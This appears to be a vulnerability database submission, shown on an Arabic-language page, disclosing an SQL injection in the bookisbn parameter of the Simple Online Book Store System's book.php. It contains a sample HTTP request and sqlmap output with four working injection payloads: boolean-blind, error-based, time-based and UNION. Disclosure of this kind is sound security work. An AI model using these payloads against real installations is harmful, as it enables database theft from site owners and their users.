إرسال #43319: SourceCodester Simple Online Book Store System book.php SQL injectionالمعلومات

عنوانSourceCodester Simple Online Book Store System book.php SQL injection
الوصفSQL injection exists in the bookisbn parameter of /obs/book.php. Attackers can insert malicious statements to disambiguate SQL queries request: GET /obs/book.php?bookisbn=64568 HTTP/1.1 Host: 192.168.0.18:8081 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0) Gecko/20100101 Firefox/103.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: PHPSESSID=g7kjmvh3bfv7hdval8mjn5kcnj Upgrade-Insecure-Requests: 1 sqlmap response: sqlmap identified the following injection point(s) with a total of 60 HTTP(s) requests: --- Parameter: bookisbn (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: bookisbn=64568' AND 1360=1360 AND 'PGUu'='PGUu Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: bookisbn=64568' AND GTID_SUBSET(CONCAT(0x717a787a71,(SELECT (ELT(3201=3201,1))),0x71707a7871),3201) AND 'bAFN'='bAFN Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: bookisbn=64568' AND (SELECT 2801 FROM (SELECT(SLEEP(5)))jPeL) AND 'nQyG'='nQyG Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: bookisbn=-4971' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x717a787a71,0x6c506b6b5467516766704a68726a75417063447650714a6c756c626b675545577361767a59424955,0x71707a7871),NULL,NULL,NULL-- - ---
المصدر⚠️ www.sourcecodester.com/php/15423/simple-online-book-store-system-php-free-source-code.html
المستخدم
 weicheng (UID 30823)
ارسال10/08/2022 03:21 PM (4 سنوات منذ)
الاعتدال11/08/2022 11:08 AM (20 hours later)
الحالةتمت الموافقة
إدخال VulDB206166 [SourceCodester Simple Online Book Store System /obs/book.php bookisbn حقن SQL]
النقاط17

التالي نظرة عامة السابق

Do you know our Splunk app?

Download it now for free!